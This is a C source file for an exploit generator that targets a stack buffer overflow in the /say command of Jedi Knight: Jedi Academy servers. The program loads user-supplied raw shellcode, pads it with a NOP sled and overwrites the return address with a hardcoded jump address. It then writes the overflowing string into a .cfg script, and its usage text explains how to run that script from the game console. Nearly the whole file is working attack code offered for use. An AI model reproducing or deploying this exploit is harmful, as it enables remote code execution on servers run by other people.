lamerlord

/*
*   jk3saybof copyright 2009 [lc]lamerlord
*
*   This program is free software: you can redistribute it and/or modify
*   it under the terms of the GNU General Public License as published by
*   the Free Software Foundation, either version 3 of the License, or
*   (at your option) any later version.
*
*   This program is distributed in the hope that it will be useful,
*   but WITHOUT ANY WARRANTY; without even the implied warranty of
*   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
*   GNU General Public License for more details.
*
*   You should have received a copy of the GNU General Public License
*   along with this program.  If not, see <http://www.gnu.org/licenses/>.
**/

#include<stdio.h>
#include <string.h>
#include <stdlib.h>

#define RETOFFSETT 1004
#define CODESIZE 1000
#define NEWRET 0x7c873c53

char code[CODESIZE];
int codesize;

int getFileSize(FILE *fp)
{
	int size = 0;

	fseek(fp, 0, SEEK_END);
	size = ftell(fp);
	fseek(fp, 0, SEEK_SET);

	return size;
}

int loadBin(char *fileName)
{
	FILE *fp;

	fp = fopen(fileName, "r");

	if(fp == 0)
	{
		printf("cannot open the file\n");
		return 0;
	}

	codesize = 0;
	codesize = getFileSize(fp);

	printf("Size of shellcode : %d Bytes\n", codesize);

	if (codesize > CODESIZE)
	{
		printf("Binary shellcode too large\n");
		return 0;
	}

	memset(code, 0x00, CODESIZE);

	fread(code, sizeof(char), codesize, fp);
	fclose(fp);
	return 1;
}

int main(int argc, char **argv)
{
	FILE *cfgfile;
	unsigned int newRet;

	char buffer[1024];

	int i, j;
	int namelen = 7;

	int* Addr;

	printf("********************************************************\n");
	printf("< #       ##     >[lc]lamerlords JK3 cfg script maker\n");
	printf("< #      #	 >For use in exploitation of voulnerable\n");
	printf("< ##lamer ##clan >Jedi knight Jedi Academy servers\n");
	printf("********************************************************\n\n");

	printf("This program makes a script that can be executed\n");
	printf("from the client game console that will give the server\n");
	printf("a too big string throug the /say command and the stack buffer \n");
	printf("overflows, and the return adress is overwritten to point at an instruction\n");
	printf("that jumps to the start of the local buffer we just overflowed,\n");
	printf("witch has been filled with user specified shellcode in raw binary format.\n\n");

	printf("Check http://aluigi.org/adv/jamsgbof-adv.txt for info about this voulnerability\n\n\n");

	newRet = NEWRET;

	if (argc < 3)
	{
		printf("Usage: crashconf <SHELLCODE> <OUTPUT>\n");
		printf("---SHELLCODE is a raw binary shellcode\n");
		printf("---OUTPUT.cfg is a text file u need to put in gamedata/base/ \n");
		printf("---Type /exec OUTPUT.cfg in JK3 console to test the exploit\n\n");
		return 0;
	}

	if(loadBin(argv[1]) == 0)						//load the raw shellcode from a binary file
	{
		printf("error while loading raw shellcode file: %s \n", argv[2]);
		printf(" Press any key to exit\n");
		return 0;
	}

	cfgfile = fopen(argv[2], "w");
											//open the text file to put the game commands in
	if(cfgfile == 0)
	{
		printf("couldnt open JK3 config file: %s \n", argv[1]);
		return 0;
	}

	memset(buffer, 0x90, 1024);

	for( i = 0; i < (RETOFFSETT + namelen); i++)
	{
		if(i == ((RETOFFSETT + namelen) -8) - codesize )	//prints the shellcode
		{
			for(j=0; j < codesize; j++)
			{
				buffer[i+j]=code[j];
			}
			printf("Printing %d bytes of code\n", codesize);

		}

		if(i == ((RETOFFSETT + namelen)-8))				//overwrite returnadress
		{
			Addr = (int*)&buffer[i];
			(*Addr) = newRet;
			buffer[i+4] = 0;
			printf("Printing adress: 0x%x over the return adress\n", newRet);
			break;
		}

	}

	fprintf(cfgfile, "say \"%s\"", buffer);				//print the overflowing string to cfgfile
	fclose(cfgfile);
	return 0;

}